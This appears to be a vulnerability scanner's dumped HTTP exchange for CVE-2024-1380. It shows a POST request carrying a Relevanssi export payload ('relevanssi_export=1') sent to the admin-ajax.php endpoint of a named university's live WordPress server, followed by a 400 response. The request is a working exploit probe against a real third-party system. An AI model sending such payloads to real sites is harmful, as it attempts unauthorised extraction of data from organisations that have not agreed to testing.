[CVE-2024-1380] Dumped HTTP request for https://camel.science.unimelb.edu.au/wp-admin/admin-ajax.php


POST /wp-admin/admin-ajax.php HTTP/1.1
Host: camel.science.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Content-Length: 27
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip

action=&relevanssi_export=1
[CVE-2024-1380] Dumped HTTP response https://camel.science.unimelb.edu.au/wp-admin/admin-ajax.php

HTTP/1.1 400 Bad Request
Connection: close
Transfer-Encoding: chunked
Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Aug 2025 15:17:30 GMT
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Server: openresty
X-Robots-Tag: noindex

0
